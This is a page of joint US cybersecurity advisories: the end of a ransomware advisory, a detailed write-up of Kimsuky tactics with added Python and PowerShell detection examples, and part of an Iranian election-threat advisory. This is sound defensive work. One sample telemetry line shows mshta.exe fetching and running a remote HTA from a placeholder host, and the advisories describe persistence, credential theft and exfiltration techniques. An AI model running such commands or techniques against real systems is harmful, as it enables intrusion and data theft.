Upon voluntary request, CISA can assist with analysis (e.g., phishing emails, storage media, logs, malware) at no cost to support your organization in understanding the root cause of an incident, even in the event additional remote assistance is not requested.

Contact Information

CISA, FBI, and HHS recommend identifying and having on hand the following contact information for ready use should your organization become a victim of a ransomware incident. Consider contacting these organizations for mitigation and response assistance or for purpose of notification.

  • State and Local Response Contacts
  • IT/IT Security Team – Centralized Cyber Incident Reporting
  • State and Local Law Enforcement
  • Fusion Center        
  • Managed/Security Service Providers
  • Cyber Insurance       

To report suspicious or criminal activity related to information found in this Joint Cybersecurity Advisory, contact your local FBI field office at www.fbi.gov/contact-us/field, or the FBI’s 24/7 Cyber Watch (CyWatch) at (855) 292-3937 or by email at CyWatch@fbi.gov. When available, please include the following information regarding the incident: date, time, and location of the incident; type of activity; number of people affected; type of equipment used for the activity; the name of the submitting company or organization; and a designated point of contact. To request incident response resources or technical assistance related to these threats, contact CISA at Central@cisa.gov.

Additionally, see the CISA and MS-ISAC's Joint Ransomware Guide for information on contacting—and what to expect from contacting—federal asset response contacts and federal threat response contacts.

DISCLAIMER

This document is marked TLP:WHITE. Disclosure is not limited. Sources may use TLP:WHITE when information carries minimal or no foreseeable risk of misuse, in accordance with applicable rules and procedures for public release. Subject to standard copyright rules, TLP:WHITE information may be distributed without restriction. For more information on the Traffic Light Protocol, see https://cisa.gov/tlp.

References

Revisions
  • October 28, 2020: Initial version

This product is provided subject to this Notification and this Privacy & Use policy.

October 27, 2020

AA20-301A: North Korean Advanced Persistent Threat Focus: Kimsuky

Original release date: October 27, 2020
Summary

This advisory uses the MITRE Adversarial Tactics, Techniques, and Common Knowledge (ATT&CK®) version 7 framework. See the ATT&CK for Enterprise version 7 for all referenced threat actor tactics and techniques.

This joint cybersecurity advisory was coauthored by the Cybersecurity and Infrastructure Security Agency (CISA), the Federal Bureau of Investigation (FBI), and the U.S. Cyber Command Cyber National Mission Force (CNMF). This advisory describes the tactics, techniques, and procedures (TTPs) used by North Korean advanced persistent threat (APT) group Kimsuky—against worldwide targets—to gain intelligence on various topics of interest to the North Korean government. The U.S. Government refers to malicious cyber activity by the North Korean government as HIDDEN COBRA. For more information on HIDDEN COBRA activity, visit https://www.us-cert.cisa.gov/northkorea.

This advisory describes known Kimsuky TTPs, as found in open-source and intelligence reporting through July 2020. The target audience for this advisory is commercial sector businesses desiring to protect their networks from North Korean APT activity.


Key Findings

This advisory’s key findings are:

  • The Kimsuky APT group has most likely been operating since 2012.
  • Kimsuky is most likely tasked by the North Korean regime with a global intelligence gathering mission.
  • Kimsuky employs common social engineering tactics, spearphishing, and watering hole attacks to exfiltrate desired information from victims.[1],[2]
  • Kimsuky is most likely to use spearphishing to gain initial access into victim hosts or networks.[3]
  • Kimsuky conducts its intelligence collection activities against individuals and organizations in South Korea, Japan, and the United States.
  • Kimsuky focuses its intelligence collection activities on foreign policy and national security issues related to the Korean peninsula, nuclear policy, and sanctions.
  • Kimsuky specifically targets:
    • Individuals identified as experts in various fields,
    • Think tanks, and
    • South Korean government entities.[4],[5],[6],[7],[8]
  • CISA, FBI, and CNMF recommend individuals and organizations within this target profile increase their defenses and adopt a heightened state of awareness. Particularly important mitigations include safeguards against spearphishing, use of multi-factor authentication, and user awareness training.
Technical Details

Initial Access

Kimsuky uses various spearphishing and social engineering methods to obtain Initial Access [TA0001] to victim networks.[9],[10],[11] Spearphishing—with a malicious attachment embedded in the email—is the most observed Kimsuky tactic (Phishing: Spearphishing Attachment [T1566.001]).[12],[13]

  • The APT group has used web hosting credentials—stolen from victims outside of their usual targets—to host their malicious scripts and tools. Kimsuky likely obtained the credentials from the victims via spearphishing and credential harvesting scripts. On the victim domains, they have created subdomains mimicking legitimate sites and services they are spoofing, such as Google or Yahoo mail.[14]
  • Kimsuky has also sent benign emails to targets, which were possibly intended to build trust in advance of a follow-on email with a malicious attachment or link.
    • Posing as South Korean reporters, Kimsuky exchanged several benign interview-themed emails with their intended target to ostensibly arrange an interview date and possibly build rapport. The emails contained the subject line “Skype Interview requests of [Redacted TV Show] in Seoul,” and began with a request to have the recipient appear as a guest on the show. The APT group invited the targets to a Skype interview on the topic of inter-Korean issues and denuclearization negotiations on the Korean Peninsula.
    • After a recipient agreed to an interview, Kimsuky sent a subsequent email with a malicious document, either as an attachment or as a Google Drive link within the body. The document usually contained a variant of BabyShark malware (see the Execution section for information on BabyShark). When the date of the interview drew near, Kimsuky sent an email canceling the interview.
  • Kimsuky tailors its spearphishing and social engineering approaches to use topics relevant to the target, such as COVID-19, the North Korean nuclear program, or media interviews.[15],[16],[17]

Kimsuky’s other methods for obtaining initial access include login-security-alert-themed phishing emails, watering hole attacks, distributing malware through torrent sharing sites, and directing victims to install malicious browser extensions (Phishing: Spearphishing Link [T1566.002], Drive-by Compromise [T1189], Man-in-the-Browser [T1185]).[18]

Execution

After obtaining initial access, Kimsuky uses BabyShark malware and PowerShell or the Windows Command Shell for Execution [TA0002].

  • BabyShark is Visual Basic Script (VBS)-based malware.
    • First, the compromised host system uses the native Microsoft Windows utility, mshta.exe, to download and execute an HTML application (HTA) file from a remote system (Signed Binary Proxy Execution: Mshta [T1218.005]).
    • The HTA file then downloads, decodes, and executes the encoded BabyShark VBS file.
    • The script maintains Persistence [TA0003] by creating a Registry key that runs on startup (Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder [T1547.001]).
    •  It then collects system information (System Information Discovery [T1082]), sends it to the operator’s command control (C2) servers, and awaits further commands.[19],[20],[21],[22]
  • Open-source reporting indicates BabyShark is delivered via an email message containing a link or an attachment (see Initial Access section for more information) (Phishing: Spearphishing Link [T1566.002], Phishing: Spearphishing Attachment [T1566.001]). Kimsuky tailors email phishing messages to match its targets’ interests. Observed targets have been U.S. think tanks and the global cryptocurrency industry.[23]
  • Kimsuky uses PowerShell to run executables from the internet without touching the physical hard disk on a computer by using the target’s memory (Command and Scripting Interpreter: PowerShell [T1059.001]). PowerShell commands/scripts can be executed without invoking powershell.exe through HTA files or mshta.exe.[24],[25],[26],[27]
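The BabyShark execution chain described above (mshta.exe fetching a remote HTA, the HTA launching a script host, and a Run-key write for persistence) can be correlated in endpoint telemetry. The following is an added detection example written for this page, not Kimsuky's code or any CISA tool; the event-record fields, pids, command lines and process tree are constructed, and the host name is a placeholder rather than an indicator.

```python
import re
from typing import Any, Dict, List, Set

URL_RE = re.compile(r"https?://", re.IGNORECASE)
RUN_KEY_RE = re.compile(r"\\CurrentVersion\\Run\\", re.IGNORECASE)
SCRIPT_HOSTS = ("\\wscript.exe", "\\cscript.exe")

Event = Dict[str, Any]


def is_remote_mshta(ev: Event) -> bool:
    """Stage 1: mshta.exe launched with an http(s) URL on its command line
    (Signed Binary Proxy Execution: Mshta [T1218.005])."""
    return (
        ev["event"] == "process"
        and str(ev["image"]).lower().endswith("\\mshta.exe")
        and URL_RE.search(str(ev["cmdline"])) is not None
    )


def descendants(events: List[Event], root_pid: int) -> Set[int]:
    """Transitively collect the pids spawned beneath root_pid.

    Real telemetry should key on process GUIDs rather than pids, which the OS
    reuses; pids keep this constructed example readable.
    """
    tree = {root_pid}
    grew = True
    while grew:
        grew = False
        for ev in events:
            if ev["event"] == "process" and ev["ppid"] in tree and ev["pid"] not in tree:
                tree.add(ev["pid"])
                grew = True
    return tree


def detect_babyshark_chain(events: List[Event]) -> List[Event]:
    """Correlate the three stages in the advisory into one finding per chain."""
    findings: List[Event] = []
    for ev in events:
        if not is_remote_mshta(ev):
            continue
        tree = descendants(events, ev["pid"])
        techniques = ["T1218.005"]
        # Stage 2: a script host spawned under the remote-HTA mshta process.
        script_hosts = [
            str(e["image"]) for e in events
            if e["event"] == "process" and e["pid"] in tree
            and e["pid"] != ev["pid"]
            and str(e["image"]).lower().endswith(SCRIPT_HOSTS)
        ]
        # Stage 3: a Run-key write by any process in that tree
        # (Boot or Logon Autostart Execution: Registry Run Keys [T1547.001]).
        run_keys = [
            str(r["target"]) for r in events
            if r["event"] == "registry" and r["pid"] in tree
            and RUN_KEY_RE.search(str(r["target"]))
        ]
        if run_keys:
            techniques.append("T1547.001")
        findings.append({
            "root_pid": ev["pid"],
            "cmdline": ev["cmdline"],
            "process_tree": sorted(tree),
            "script_hosts": script_hosts,
            "run_keys": run_keys,
            "techniques": techniques,
        })
    return findings


# Constructed sample telemetry (not from the advisory): simplified Sysmon-style
# process-creation and registry-value-set records. The host name is a
# placeholder, not an indicator.
SAMPLE_EVENTS: List[Event] = [
    {"event": "process", "pid": 4012, "ppid": 3300,
     "image": r"C:\Windows\System32\mshta.exe",
     "cmdline": "mshta.exe http://placeholder.invalid/update.hta"},
    {"event": "process", "pid": 4020, "ppid": 4012,
     "image": r"C:\Windows\System32\wscript.exe",
     "cmdline": r"wscript.exe //e:vbscript C:\Users\Public\svc.vbs"},
    {"event": "registry", "pid": 4020,
     "target": r"HKCU\Software\Microsoft\Windows\CurrentVersion\Run\svc"},
    # A locally installed HTA: no URL on the command line, so not flagged.
    {"event": "process", "pid": 5100, "ppid": 900,
     "image": r"C:\Windows\System32\mshta.exe",
     "cmdline": r"mshta.exe C:\Program Files\Vendor\help.hta"},
]

if __name__ == "__main__":
    for finding in detect_babyshark_chain(SAMPLE_EVENTS):
        print(finding)
```

A local HTA launched by mshta.exe without a URL is deliberately left unflagged so the rule keys on the remote-download behaviour the advisory describes rather than on mshta.exe alone.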
Persistence

Kimsuky has demonstrated the ability to establish Persistence [TA0003] through using malicious browser extensions, modifying system processes, manipulating the autostart execution, using Remote Desktop Protocol (RDP), and changing the default file association for an application. By using these methods, Kimsuky can gain login and password information and/or launch malware outside of some application allowlisting solutions.

  • In 2018, Kimsuky used an extension, which was available on the Google Chrome Web Store, to infect victims and steal passwords and cookies from their browsers (Man-in-the-Browser [T1185]). The extension’s reviews gave it a five-star rating; however, the text of the reviews applied to other extensions or was negative. The reviews were likely left by compromised Google+ accounts.[28]
  • Kimsuky may install a new service that can execute at startup by using utilities to interact with services or by directly modifying the Registry keys (Boot or Logon Autostart Execution [T1547]). The service name may be disguised with the name from a related operating system function or by masquerading as benign software. Services may be created with administrator privileges but are executed under system privileges, so an adversary can also use a service to escalate privileges from Administrator to System. They can also directly start services through Service Execution.[29],[30]
  • During the STOLEN PENCIL operation in May 2018, Kimsuky used the GREASE malware. GREASE is a tool capable of adding a Windows administrator account and enabling RDP while avoiding firewall rules (Remote Services: Remote Desktop Protocol [T1021.001]).[31]
  • Kimsuky uses a document stealer module that changes the default program associated with Hangul Word Processor (HWP) documents (.hwp files) in the Registry (Event Triggered Execution: Change Default File Association [T1546.001]). Kimsuky manipulates the default Registry setting to open a malicious program instead of the legitimate HWP program (HWP is a Korean word processor). The malware will read and email the content from HWP documents before the legitimate HWP program ultimately opens the document.[32] Kimsuky also targets Microsoft Office users by formatting their documents in a .docx file rather than .hwp and will tailor their macros accordingly.[33]
  • Kimsuky maintains access to compromised domains by uploading actor-modified versions of open-source Hypertext Processor (PHP)-based web shells; these web shells enable the APT actor to upload, download, and delete files and directories on the compromised domains (Server Software Component: Web Shell [T1505.003]). The actor often adds “Dinosaur” references within the modified web shell codes.[34]
Privilege Escalation

Kimsuky uses well-known methods for Privilege Escalation [TA0004]. These methods include placing scripts in the Startup folder, creating and running new services, changing default file associations, and injecting malicious code in explorer.exe.

  • Kimsuky has used Win7Elevate—an exploit from the Metasploit framework—to bypass the User Account Control to inject malicious code into explorer.exe (Process Injection [T1055]). This malicious code decrypts its spying library—a collection of keystroke logging and remote control access tools and remote control download and execution tools—from resources, regardless of the victim’s operating system. It then saves the decrypted file to a disk with a random but hardcoded name (e.g., dfe8b437dd7c417a6d.tmp) in the user’s temporary folder and loads this file as a library, ensuring the tools are then on the system even after a reboot. This allows for the escalation of privileges.[35]
  • Before the injection takes place, the malware sets the necessary privileges (see figure 1). The malware writes the path to its malicious Dynamic Link Library (DLL) and ensures the remote process is loaded by creating a remote thread within explorer.exe (Process Injection [T1055]).[36]

Figure 1: Privileges set for the injection [37]

Defense Evasion

Kimsuky uses well-known and widely available methods for Defense Evasion [TA0005] within a network. These methods include disabling security tools, deleting files, and using Metasploit.[38],[39]

  • Kimsuky’s malicious DLL runs at startup to zero (i.e., turn off) the Windows firewall Registry keys (see figure 2). This disables the Windows system firewall and turns off the Windows Security Center service, which prevents the service from alerting the user about the disabled firewall (see figure 2) (Impair Defenses: Disable or Modify System Firewall [T1562.004]).[40]

Figure 2: Disabled firewall values in the Registry [41]

  • Kimsuky has used a keylogger that deletes exfiltrated data on disk after it is transmitted to its C2 server (Indicator Removal on Host: File Deletion [T1070.004]).[42]
  • Kimsuky has used mshta.exe, which is a utility that executes Microsoft HTAs. It can be used for proxy execution of malicious .hta files and JavaScript or VBS through a trusted Windows utility (Signed Binary Proxy Execution: Mshta [T1218.005]). It can also be used to bypass application allow listing solutions (Abuse Elevation Control Mechanism: Bypass User Access Control [T1548.002]).[43],[44]
  • Win7Elevate—which was noted above—is also used to evade traditional security measures. Win7Elevate is a part of the Metasploit framework open-source code and is used to inject malicious code into explorer.exe (Process Injection [T1055]). The malicious code decrypts its spying library from resources, saves the decrypted file to disk with a random but hardcoded name in the victim's temporary folder, and loads the file as a library.[45],[46],[47]
Credential Access

Kimsuky uses legitimate tools and network sniffers to harvest credentials from web browsers, files, and keyloggers (Credential Access [TA0006]).

  • Kimsuky uses memory dump programs instead of using well-known malicious software and performs the credential extraction offline. Kimsuky uses ProcDump, a Windows command line administration tool, also available for Linux, that allows a user to create crash dumps/core dumps of processes based upon certain criteria, such as high central processing unit (CPU) utilization (OS Credential Dumping [T1003]). ProcDump monitors for CPU spikes and generates a crash dump when a value is met; it passes information to a Word document saved on the computer. It can be used as a general process dump utility that actors can embed in other scripts, as seen by Kimsuky’s inclusion of ProcDump in the BabyShark malware.[48]
  • According to open-source security researchers, Kimsuky abuses a Chrome extension to steal passwords and cookies from browsers (Man-in-the-Browser [T1185]).[49],[50] The spearphishing email directs a victim to a phishing site, where the victim is shown a benign PDF document but is not able to view it. The victim is then redirected to the official Chrome Web Store page to install a Chrome extension, which has the ability to steal cookies and site passwords and loads a JavaScript file, named jQuery.js, from a separate site (see figure 3).[51]

Figure 3: JavaScript file, named jQuery.js [52]

  • Kimsuky also uses a PowerShell based keylogger, named MECHANICAL, and a network sniffing tool, named Nirsoft SniffPass (Input Capture: Keylogging [T1056.001], Network Sniffing [T1040]). MECHANICAL logs keystrokes to %userprofile%\appdata\roaming\apach.{txt,log} and is also a "cryptojacker," which is a tool that uses a victim’s computer to mine cryptocurrency. Nirsoft SniffPass is capable of obtaining passwords sent over non-secure protocols.[53]
  • Kimsuky used actor-modified versions of PHProxy, an open-source web proxy written in PHP, to examine web traffic between the victim and the website accessed by the victims and to collect any credentials entered by the victim.[54]
Discovery

Kimsuky enumerates system information and the file structure for victims’ computers and networks (Discovery [TA0007]). Kimsuky appears to rely on using the victim’s operating system command prompt to enumerate the file structure and system information (File and Directory Discovery [T1083]). The information is directed to C:\WINDOWS\msdatl3.inc, read by malware, and likely emailed to the malware’s command server.[55]

Collection

Kimsuky collects data from the victim system through its HWP document malware and its keylogger (Collection [TA0009]). The HWP document malware changes the default program association in the Registry to open HWP documents (Event Triggered Execution: Change Default File Association [T1546.001]). When a user opens an HWP file, the Registry key change triggers the execution of malware that opens the HWP document and then sends a copy of the HWP document to an account under the adversary’s control. The malware then allows the user to open the file as normal without any indication to the user that anything has occurred. The keylogger intercepts keystrokes and writes them to C:\Program Files\Common Files\System\Ole DB\msolui80.inc and records the active window name where the user pressed keys (Input Capture: Keylogging [T1056.001]). There is another keylogger variant that logs keystrokes into C:\WINDOWS\setup.log.[56]

Kimsuky has also used a Mac OS Python implant that gathers data from Mac OS systems and sends it to a C2 server (Command and Scripting Interpreter: Python [T1059.006]). The Python program downloads various implants based on C2 options specified after the filedown.php (see figure 4).

Figure 4: Python Script targeting MacOS [57]

Command and Control

Kimsuky has used a modified TeamViewer client, version 5.0.9104, for Command and Control [TA0011] (Remote Access Software [T1219]). During the initial infection, the service “Remote Access Service” is created and adjusted to execute C:\Windows\System32\vcmon.exe at system startup (Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder [T1547.001]). Every time vcmon.exe is executed, it disables the firewall by zeroing out Registry values (Impair Defenses: Disable or Modify System Firewall [T1562.004]). The program then modifies the TeamViewer Registry settings by changing the TeamViewer strings in TeamViewer components. The launcher then configures several Registry values, including SecurityPasswordAES, that control how the remote access tool will work. The SecurityPasswordAES Registry value represents a hash of the password used by a remote user to connect to TeamViewer Client (Use Alternate Authentication Material: Pass the Hash [T1550.002]). This way, the attackers set a pre-shared authentication value to have access to the TeamViewer Client. The attacker will then execute the TeamViewer client netsvcs.exe.[58]

Kimsuky has been using a consistent format. In the URL used recently—express.php?op=1—there appears to be an option range from 1 to 3.[59]

Exfiltration

Open-source reporting from cybersecurity companies describes two different methods Kimsuky has used to exfiltrate stolen data: via email or through an RC4 key generated as an MD5 hash or a randomly generated 117-bytes buffer (Exfiltration [TA0010]).

There was no indication that the actor destroyed computers during the observed exfiltrations, suggesting Kimsuky’s intention is to steal information, not to disrupt computer networks. Kimsuky’s preferred method for sending or receiving exfiltrated information is through email, with their malware on the victim machine encrypting the data before sending it to a C2 server (Archive Collected Data [T1560]). Kimsuky also sets up auto-forward rules within a victim’s email account (Email Collection: Email Forwarding Rule [T1114.003]).

Kimsuky also uses an RC4 key generated as an MD5 hash or a randomly generated 117-bytes buffer to exfiltrate stolen data. The data is sent RSA-encrypted (Encrypted Channel: Symmetric Cryptography [T1573.001]). Kimsuky’s malware constructs a 1120-bit public key and uses it to encrypt the 117-bytes buffer. The resulting data file is saved in C:\Program Files\Common Files\System\Ole DB\ (Data Staged: Local Data Staging [T1074.001]).[60]
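An added PowerShell host check (not code from the advisory) that looks for the artifacts this section names: the keylogger output files, the OLE DB staging folder, the “Remote Access Service” launcher and TeamViewer client binaries, the .hwp file handler, and the firewall state. The function name and output layout are this example's own.

```powershell
# Added example, not code from the advisory. Checks a Windows host for the
# Kimsuky artifacts named in the text: keylogger output files, the OLE DB
# staging folder, the "Remote Access Service" launcher (vcmon.exe), the
# modified TeamViewer client (netsvcs.exe), and the .hwp file association.
function Find-KimsukyHostArtifacts {
    [CmdletBinding()]
    param()

    $findings = [System.Collections.Generic.List[object]]::new()
    function Add-Finding([string]$Type, [string]$Value) {
        $findings.Add([pscustomobject]@{ Type = $Type; Value = $Value })
    }

    # Keylogger output files named in the advisory.
    foreach ($path in @(
            "$env:ProgramFiles\Common Files\System\Ole DB\msolui80.inc",
            "$env:SystemRoot\setup.log")) {
        if (Test-Path -LiteralPath $path) { Add-Finding 'KeyloggerFile' $path }
    }

    # The same folder stages the RSA-encrypted exfiltration file. It normally
    # holds only OLE DB components, so anything written recently deserves review.
    $staging = "$env:ProgramFiles\Common Files\System\Ole DB"
    Get-ChildItem -LiteralPath $staging -File -ErrorAction SilentlyContinue |
        Where-Object { $_.LastWriteTime -gt (Get-Date).AddDays(-30) } |
        ForEach-Object { Add-Finding 'RecentStagedFile' $_.FullName }

    # Launcher and client: a service named "Remote Access Service", or any
    # service whose image path is vcmon.exe or netsvcs.exe.
    Get-CimInstance -ClassName Win32_Service -ErrorAction SilentlyContinue |
        Where-Object { $_.DisplayName -eq 'Remote Access Service' -or
                       $_.PathName -match '\\(vcmon|netsvcs)\.exe' } |
        ForEach-Object { Add-Finding 'Service' "$($_.Name): $($_.PathName)" }

    # Run-key persistence pointing at the same binaries.
    foreach ($runKey in 'HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run',
                        'HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run') {
        $values = Get-ItemProperty -Path $runKey -ErrorAction SilentlyContinue
        if (-not $values) { continue }
        foreach ($v in $values.PSObject.Properties) {
            if ($v.Value -is [string] -and $v.Value -match '\\(vcmon|netsvcs)\.exe') {
                Add-Finding 'RunKey' "$runKey\$($v.Name) = $($v.Value)"
            }
        }
    }

    # Running processes with those image names.
    Get-Process -Name vcmon, netsvcs -ErrorAction SilentlyContinue |
        ForEach-Object { Add-Finding 'Process' "$($_.Name) (PID $($_.Id)) $($_.Path)" }

    # Default .hwp handler: reported so the analyst can compare it with the
    # expected Hancom handler; a changed association is the trigger described above.
    $ext = Get-ItemProperty -Path 'Registry::HKEY_CLASSES_ROOT\.hwp' -ErrorAction SilentlyContinue
    $progId = if ($ext) { $ext.'(default)' } else { $null }
    if ($progId) {
        $command = (Get-ItemProperty -Path "Registry::HKEY_CLASSES_ROOT\$progId\shell\open\command" `
                        -ErrorAction SilentlyContinue).'(default)'
        Add-Finding 'HwpHandler' "$progId -> $command"
    }

    # Firewall state: the launcher disables the firewall through Registry values,
    # so a disabled profile on a host that should have one enabled is a signal.
    if (Get-Command Get-NetFirewallProfile -ErrorAction SilentlyContinue) {
        Get-NetFirewallProfile |
            Where-Object { "$($_.Enabled)" -ne 'True' } |
            ForEach-Object { Add-Finding 'FirewallProfileDisabled' $_.Name }
    }

    return $findings
}

Find-KimsukyHostArtifacts | Format-Table -AutoSize
```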

Indicators of Compromise

Kimsuky has used the domains listed in table 1 to carry out its objectives:

For a downloadable copy of IOCs, see AA20-301A.stix.

Table 1: Domains used by Kimsuky


Table 2: Redacted domains used by Kimsuky

  • [REDACTED]/home/dwn.php?van=101
  • [REDACTED]/home/dwn.php?v%20an=101
  • [REDACTED]/home/dwn.php?van=102
  • [REDACTED]/home/up.php?id=NQDPDE
  • [REDACTED]/test/Update.php?wShell=201

Contact Information

To report suspicious or criminal activity related to information found in this Joint Cybersecurity Advisory, contact your local FBI field office at www.fbi.gov/contact-us/field, or the FBI’s 24/7 Cyber Watch (CyWatch) at (855) 292-3937 or by e-mail at CyWatch@fbi.gov. When available, please include the following information regarding the incident: date, time, and location of the incident; type of activity; number of people affected; type of equipment used for the activity; the name of the submitting company or organization; and a designated point of contact. To request incident response resources or technical assistance related to these threats, contact CISA at Central@cisa.dhs.gov.

DISCLAIMER

This information is provided "as is" for informational purposes only. The United States Government does not provide any warranties of any kind regarding this information. In no event shall the United States Government or its contractors or subcontractors be liable for any damages, including but not limited to, direct, indirect, special or consequential damages, arising out of, resulting from, or in any way connected with this information, whether or not based upon warranty, contract, tort, or otherwise, whether or not arising out of negligence, and whether or not injury was sustained from, or arose out of the results of, or reliance upon the information.

The United States Government does not endorse any commercial product or service, including any subjects of analysis. Any reference to specific commercial products, processes, or services by service mark, trademark, manufacturer, or otherwise, does not constitute or imply their endorsement, recommendation, or favoring by the United States Government.

Revisions
  • October 27, 2020: Initial Version

This product is provided subject to this Notification and this Privacy & Use policy.

October 22, 2020

AA20-296B: Iranian Advanced Persistent Threat Actors Threaten Election-Related Systems

Original release date: October 22, 2020
Summary

The Cybersecurity and Infrastructure Security Agency (CISA) and the Federal Bureau of Investigation (FBI) are warning that Iranian advanced persistent threat (APT) actors are likely intent on influencing and interfering with the U.S. elections to sow discord among voters and undermine public confidence in the U.S. electoral process.

The APT actors are creating fictitious media sites and spoofing legitimate media sites to spread obtained U.S. voter-registration data, anti-American propaganda, and misinformation about voter suppression, voter fraud, and ballot fraud.

The APT actors have historically exploited critical vulnerabilities to conduct distributed denial-of-service (DDoS) attacks, structured query language (SQL) injection attacks, spear-phishing campaigns, website defacements, and disinformation campaigns.

Click here for a PDF version of this report.

Technical Details

These actors have conducted a significant number of intrusions against U.S.-based networks since August 2019. The actors leveraged several Common Vulnerabilities and Exposures (CVEs)—notably CVE-2020-5902 and CVE-2017-9248—pertaining to virtual private networks (VPNs) and content management systems (CMSs). 

  • CVE-2020-5902 affects F5 VPNs. Remote attackers could exploit this vulnerability to execute arbitrary code.[1]
  • CVE-2017-9248 affects Telerik UI. Attackers could exploit this vulnerability in web applications using Telerik UI for ASP.NET AJAX to conduct cross-site scripting (XSS) attacks.[2]

Historically, these actors have conducted DDoS attacks, SQL injection attacks, spear-phishing campaigns, website defacements, and disinformation campaigns. These activities could render these systems temporarily inaccessible to the public or election officials, which could slow, but would not prevent, voting or the reporting of results.

  • A DDoS attack could slow or render election-related public-facing websites inaccessible by flooding the internet-accessible server with requests; this would prevent users from accessing online resources, such as voting information or non-official voting results. In the past, cyber actors have falsely claimed DDoS attacks have compromised the integrity of voting systems in an effort to mislead the public that their attack would prevent a voter from casting a ballot or change votes already cast.
  • A SQL injection involves a threat actor inserting malicious code into the entry field of an application, causing that code to execute if entries have not been sanitized. SQL injections are among the most dangerous and common exploits affecting websites. A SQL injection into a media company’s CMS could enable a cyber actor access to network systems to manipulate content or falsify news reports prior to publication.
  • Spear-phishing messages may not be easily detectible. These emails often ask victims to fill out forms or verify information through links embedded in the email. APT actors use spear phishing to gain access to information—often credentials, such as passwords—and to identify follow-on victims. A malicious cyber actor could use compromised email access to spread disinformation to the victims’ contacts or collect information sent to or from the compromised account.
  • Public-facing website defacements typically involve a cyber threat actor compromising the website or its associated CMS, allowing the actor to upload images to the site’s landing page. In situations where such public-facing websites relate to elections (e.g., the website of a county board of elections), defacements could cast doubt on the security and legitimacy of the websites’ information. If cyber actors were able to successfully change an election-related website, the underlying data and internal systems would remain uncompromised.
  • Disinformation campaigns involve malign actions taken by foreign governments or actors designed to sow discord, manipulate public discourse, or discredit the electoral system. Malicious actors often use social media as well as fictitious and spoofed media sites for these campaigns. Based on their corporate policies, social media companies have worked to counter these actors’ use of their platforms to promote fictitious news stories by removing the news stories, and in many instances, closing the accounts related to the malicious activity. However, these adversaries will continue their attempts to create fictitious accounts that promote divisive storylines to sow discord, even after the election.
Mitigations

The following recommended mitigations list includes self-protection strategies against the cyber techniques used by the APT actors:

  • Validate input—input validation is a method of sanitizing untrusted input provided by web application users. Implementing input validation can protect against security flaws of web applications by significantly reducing the probability of successful exploitation. Types of attacks possibly prevented include SQL injection, XSS, and command injection.
  • Audit your network for systems using Remote Desktop Protocol (RDP) and other internet-facing services. Disable the service if unneeded or install available patches. Users may need to work with their technology vendors to confirm that patches will not affect system processes.
  • Verify that all cloud-based virtual machine instances with a public IP do not have open RDP ports, unless there is a valid business reason to do so. Place any system with an open RDP port behind a firewall, and require users to use a VPN to access it through the firewall.
  • Enable strong password requirements and account lockout policies to defend against brute-force attacks.
  • Apply multi-factor authentication, when possible.
  • Apply system and software updates regularly, particularly if you are deploying products affected by CVE-2020-5902 and CVE-2017-9248.
  • Maintain a good information back-up strategy that involves routinely backing up all critical data and system configuration information on a separate device. Store the backups offline; verify their integrity and restoration process.
  • Enable logging and ensure logging mechanisms capture RDP logins. Keep logs for a minimum of 90 days, and review them regularly to detect intrusion attempts.
  • When creating cloud-based virtual machines, adhere to the cloud provider's best practices for remote access.
  • Ensure third parties that require RDP access are required to follow internal policies on remote access.
  • Minimize network exposure for all control system devices. Where possible, critical devices should not have RDP enabled.
  • Regulate and limit external to internal RDP connections. When external access to internal resources is required, use secure methods, such as VPNs, recognizing VPNs are only as secure as the connected devices.
  • Be aware of unsolicited contact on social media from any individual you do not know.
  • Be aware of attempts to pass links or files via social media from anyone you do not know.
  • Be aware of unsolicited requests to share a file via online services.
  • Be aware of email messages conveying suspicious alerts about your email or other online accounts, including login notifications from foreign countries or other alerts indicating attempted unauthorized access to your accounts.
  • Be suspicious of emails purporting to be from legitimate online services (e.g., the images in the email appear to be slightly pixelated and/or grainy, language in the email seems off, the email originates from an IP address not attributable to the provider/company).
  • Be suspicious of unsolicited email messages that contain shortened links (e.g., via tinyurl, bit.ly).
  • Use security features provided by social media platforms, use strong passwords, change passwords frequently, and use a different password for each social media account.
  • See CISA’s Tip on Best Practices for Securing Election Systems for more information.
General Mitigations

Keep applications and systems updated and patched

Apply all available software updates and patches; automate this process to the greatest extent possible (e.g., by using an update service provided directly from the vendor). Automating updates and patches is critical because of the speed at which threat actors create exploits after a patch is released. These “N-day” exploits can be as damaging as zero-day exploits. Vendor updates must also be authentic; updates are typically signed and delivered over protected links to ensure the integrity of the content. Without rapid and thorough patch application, threat actors can operate inside a defender’s patch cycle.[3] In addition to updating the application, use tools (e.g., the OWASP Dependency-Check Project tool[4]) to identify publicly known vulnerabilities in third-party libraries that the application depends on.

Scan web applications for SQL injection and other common web vulnerabilities

Implement a plan to scan public-facing web servers for common web vulnerabilities (SQL injection, cross-site scripting, etc.); use a commercial web application vulnerability scanner in combination with a source code scanner.[5] As vulnerabilities are found, they should be fixed or patched. This is especially crucial for networks that host older web applications; as sites get older, more vulnerabilities are discovered and exposed.

Deploy a web application firewall 

Deploy a web application firewall (WAF) to help prevent invalid input attacks and other attacks destined for the web application. WAFs are intrusion detection/prevention devices that inspect each web request made to and from the web application to determine if the request is malicious. Some WAFs install on the host system and others are dedicated devices that sit in front of the web application. WAFs also weaken the effectiveness of automated web vulnerability scanning tools.

Deploy techniques to protect against web shells

Patch web application vulnerabilities or fix configuration weaknesses that allow web shell attacks, and follow guidance on detecting and preventing web shell malware.[6] Malicious cyber actors often deploy web shells—software that can enable remote administration—on a victim’s web server. Malicious cyber actors can use web shells to execute arbitrary system commands, which are commonly sent over HTTP or HTTPS. Attackers often create web shells by adding or modifying a file in an existing web application. Web shells provide attackers with persistent access to a compromised network using communications channels disguised to blend in with legitimate traffic. Web shell malware is a long-standing, pervasive threat that continues to evade many security tools.

Use multi-factor authentication for administrator accounts

Prioritize protection for accounts with elevated privileges, with remote access, and/or used on high value assets.[7] Use physical token-based authentication systems to supplement knowledge-based factors such as passwords and personal identification numbers (PINs).[8] Organizations should migrate away from single-factor authentication, such as password-based systems, which are subject to poor user choices and more susceptible to credential theft, forgery, and password reuse across multiple systems.

Remediate critical web application security risks

First, identify and remediate critical web application security risks; then, move on to other less critical vulnerabilities. Follow available guidance on securing web applications.[9],[10],[11]

How do I respond to unauthorized access to election-related systems?

Implement your security incident response and business continuity plan

